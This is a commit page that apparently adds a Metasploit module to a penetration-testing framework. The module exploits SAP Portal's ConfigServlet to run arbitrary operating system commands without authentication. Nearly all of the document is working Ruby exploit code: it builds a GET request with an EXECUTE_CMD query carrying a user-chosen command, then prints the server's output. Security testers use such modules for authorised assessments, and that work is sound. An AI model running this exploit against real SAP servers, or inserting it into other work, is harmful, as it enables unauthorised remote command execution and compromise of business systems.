Skip to content

Commit 8c9715c

Browse files
author
jvazquez-r7
committed
Land rapid7#1751, @andrewkabai's SAP Portal remote OS command exec
2 parents a09b3b8 + 79eb2ff commit 8c9715c

File tree

1 file changed

+64
-0
lines changed

1 file changed

+64
-0
lines changed

modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb

Lines changed: 64 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,64 @@
1+
require 'msf/core'
2+
3+
class Metasploit3 < Msf::Auxiliary
4+
include Msf::Exploit::Remote::HttpClient
5+
6+
def initialize(info = {})
7+
super(update_info(info,
8+
'Name' => 'SAP ConfigServlet OS Command Execution',
9+
'Description' => %q{
10+
This module allows execution of operating system commands through
11+
the SAP ConfigServlet without any authentication.
12+
},
13+
'Author' =>
14+
[
15+
'Dmitry Chastuhin', # Vulnerability discovery (based on the reference presentation)
16+
'Andras Kabai' # Metasploit module
17+
],
18+
'License' => MSF_LICENSE,
19+
'References' =>
20+
[
21+
[ 'URL', 'http://erpscan.com/wp-content/uploads/2012/11/Breaking-SAP-Portal-HackerHalted-2012.pdf'],
22+
[ 'EDB', '24963' ]
23+
],
24+
'DisclosureDate' => 'Nov 01 2012' # Based on the reference presentation
25+
))
26+
27+
register_options(
28+
[
29+
Opt::RPORT(50000),
30+
OptString.new('CMD', [ true, 'The command to execute', 'whoami']),
31+
OptString.new('TARGETURI', [ true, 'Path to ConfigServlet', '/ctc/servlet'])
32+
], self.class)
33+
end
34+
35+
def run
36+
begin
37+
print_status("#{rhost}:#{rport} - Sending remote command: " + datastore['CMD'])
38+
uri = normalize_uri(target_uri.path, 'ConfigServlet')
39+
40+
res = send_request_cgi(
41+
{
42+
'uri' => uri,
43+
'method' => 'GET',
44+
'query' => 'param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=' + Rex::Text::uri_encode(datastore['CMD'])
45+
})
46+
if !res or res.code != 200
47+
print_error("#{rhost}:#{rport} - Exploit failed.")
48+
return
49+
end
50+
rescue ::Rex::ConnectionError
51+
print_error("#{rhost}:#{rport} - Failed to connect to the server")
52+
return
53+
end
54+
55+
if res.body.include?("Process created")
56+
print_good("#{rhost}:#{rport} - Exploited successfully\n")
57+
print_line("#{rhost}:#{rport} - Command: #{datastore['CMD']}\n")
58+
print_line("#{rhost}:#{rport} - Output: #{res.body}")
59+
else
60+
print_error("#{rhost}:#{rport} - Exploit failed.")
61+
vprint_error("#{rhost}:#{rport} - Output: #{res.body}")
62+
end
63+
end
64+
end

0 commit comments

Comments
 (0)